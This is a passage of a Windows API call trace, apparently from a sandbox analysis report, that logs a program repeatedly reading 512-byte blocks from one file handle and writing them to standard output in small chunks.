(_FileHandle=1) returned 0x50 [0151.290] GetFileType (hFile=0x50) returned 0x1 [0151.290] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.290] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.290] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.290] GetFileType (hFile=0x50) returned 0x1 [0151.290] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.290] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.290] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.290] GetFileType (hFile=0x50) returned 0x1 [0151.291] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.291] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.291] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.291] GetFileType (hFile=0x50) returned 0x1 [0151.291] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.291] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.291] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.291] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.291] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.291] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, 
lpOverlapped=0x0) returned 1 [0151.291] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.291] GetFileType (hFile=0x50) returned 0x1 [0151.291] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.291] GetFileType (hFile=0x50) returned 0x1 [0151.291] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.291] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.291] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.291] GetFileType (hFile=0x50) returned 0x1 [0151.291] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.291] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.291] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.291] GetFileType (hFile=0x50) returned 0x1 [0151.291] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.291] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.292] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.292] GetFileType (hFile=0x50) returned 0x1 [0151.292] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.292] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.292] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.292] GetFileType (hFile=0x50) returned 0x1 [0151.292] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.292] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 
| out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.292] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.292] GetFileType (hFile=0x50) returned 0x1 [0151.292] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.292] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.292] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.292] GetFileType (hFile=0x50) returned 0x1 [0151.292] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.292] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.292] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.292] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.292] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.292] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.292] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.292] GetFileType (hFile=0x50) returned 0x1 [0151.293] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.293] GetFileType (hFile=0x50) returned 0x1 [0151.293] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.293] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.293] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.293] GetFileType (hFile=0x50) returned 0x1 [0151.293] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0151.293] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.293] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.293] GetFileType (hFile=0x50) returned 0x1 [0151.293] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.293] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.293] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.293] GetFileType (hFile=0x50) returned 0x1 [0151.293] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.293] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.293] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.293] GetFileType (hFile=0x50) returned 0x1 [0151.293] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.293] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.293] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.293] GetFileType (hFile=0x50) returned 0x1 [0151.293] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.293] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.294] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.294] GetFileType (hFile=0x50) returned 0x1 [0151.294] _get_osfhandle (_FileHandle=1) returned 0x50 
[0151.294] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.294] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.294] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.294] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.294] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.294] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.294] GetFileType (hFile=0x50) returned 0x1 [0151.294] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.294] GetFileType (hFile=0x50) returned 0x1 [0151.294] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.294] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.294] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.294] GetFileType (hFile=0x50) returned 0x1 [0151.294] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.294] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.294] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.294] GetFileType (hFile=0x50) returned 0x1 [0151.294] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.294] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 
[0151.295] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.295] GetFileType (hFile=0x50) returned 0x1 [0151.295] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.295] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.295] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.295] GetFileType (hFile=0x50) returned 0x1 [0151.295] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.295] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.295] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.295] GetFileType (hFile=0x50) returned 0x1 [0151.295] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.295] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.295] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.295] GetFileType (hFile=0x50) returned 0x1 [0151.295] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.295] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.295] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.295] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.295] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.295] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, 
lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.295] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.295] GetFileType (hFile=0x50) returned 0x1 [0151.295] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.295] GetFileType (hFile=0x50) returned 0x1 [0151.296] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.296] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.296] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.296] GetFileType (hFile=0x50) returned 0x1 [0151.296] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.296] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.296] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.296] GetFileType (hFile=0x50) returned 0x1 [0151.296] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.296] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.296] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.296] GetFileType (hFile=0x50) returned 0x1 [0151.296] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.296] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.296] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.296] GetFileType (hFile=0x50) returned 0x1 [0151.296] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.296] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.296] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.296] GetFileType (hFile=0x50) returned 0x1 [0151.296] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.296] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.297] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.297] GetFileType (hFile=0x50) returned 0x1 [0151.297] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.297] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.297] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.297] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.297] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.297] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.297] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.297] GetFileType (hFile=0x50) returned 0x1 [0151.297] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.297] GetFileType (hFile=0x50) returned 0x1 [0151.297] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.297] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.297] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.297] GetFileType 
(hFile=0x50) returned 0x1 [0151.297] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.297] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.297] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.297] GetFileType (hFile=0x50) returned 0x1 [0151.298] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.298] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.298] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.298] GetFileType (hFile=0x50) returned 0x1 [0151.298] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.298] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.298] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.298] GetFileType (hFile=0x50) returned 0x1 [0151.298] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.298] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.298] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.298] GetFileType (hFile=0x50) returned 0x1 [0151.298] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.298] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.298] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.298] GetFileType (hFile=0x50) returned 0x1 [0151.298] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0151.298] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.298] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.298] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.298] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.299] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.299] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.299] GetFileType (hFile=0x50) returned 0x1 [0151.299] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.299] GetFileType (hFile=0x50) returned 0x1 [0151.299] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.299] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.299] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.299] GetFileType (hFile=0x50) returned 0x1 [0151.299] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.299] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.299] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.299] GetFileType (hFile=0x50) returned 0x1 [0151.299] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.299] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, 
lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.299] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.299] GetFileType (hFile=0x50) returned 0x1 [0151.299] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.300] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.300] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.300] GetFileType (hFile=0x50) returned 0x1 [0151.300] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.300] WriteFile (in: hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.300] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.300] GetFileType (hFile=0x50) returned 0x1 [0151.300] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.300] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.300] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.300] GetFileType (hFile=0x50) returned 0x1 [0151.300] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.300] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.300] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.300] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e074 | out: lpNewFilePointer=0x0) returned 1 [0151.300] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.300] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.300] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.300] GetFileType (hFile=0x50) returned 0x1 [0151.300] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.300] GetFileType (hFile=0x50) returned 0x1 [0151.300] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.300] WriteFile (in: hFile=0x50, lpBuffer=0x30eea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.301] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.301] GetFileType (hFile=0x50) returned 0x1 [0151.301] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.301] WriteFile (in: hFile=0x50, lpBuffer=0x30eef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30eef4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.301] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.301] GetFileType (hFile=0x50) returned 0x1 [0151.301] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.301] WriteFile (in: hFile=0x50, lpBuffer=0x30ef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef44*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.301] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.301] GetFileType (hFile=0x50) returned 0x1 [0151.301] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.301] WriteFile (in: hFile=0x50, lpBuffer=0x30ef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30ef94*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.301] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.301] GetFileType (hFile=0x50) returned 0x1 [0151.301] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.301] WriteFile (in: 
hFile=0x50, lpBuffer=0x30efe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30efe4*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.301] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.301] GetFileType (hFile=0x50) returned 0x1 [0151.301] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.301] WriteFile (in: hFile=0x50, lpBuffer=0x30f034*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f034*, lpNumberOfBytesWritten=0x30e088*=0x50, lpOverlapped=0x0) returned 1 [0151.302] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.302] GetFileType (hFile=0x50) returned 0x1 [0151.302] _get_osfhandle (_FileHandle=1) returned 0x50 [0151.302] WriteFile (in: hFile=0x50, lpBuffer=0x30f084*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e088, lpOverlapped=0x0 | out: lpBuffer=0x30f084*, lpNumberOfBytesWritten=0x30e088*=0x20, lpOverlapped=0x0) returned 1 [0151.302] _get_osfhandle (_FileHandle=4) returned 0x58 [0151.302] 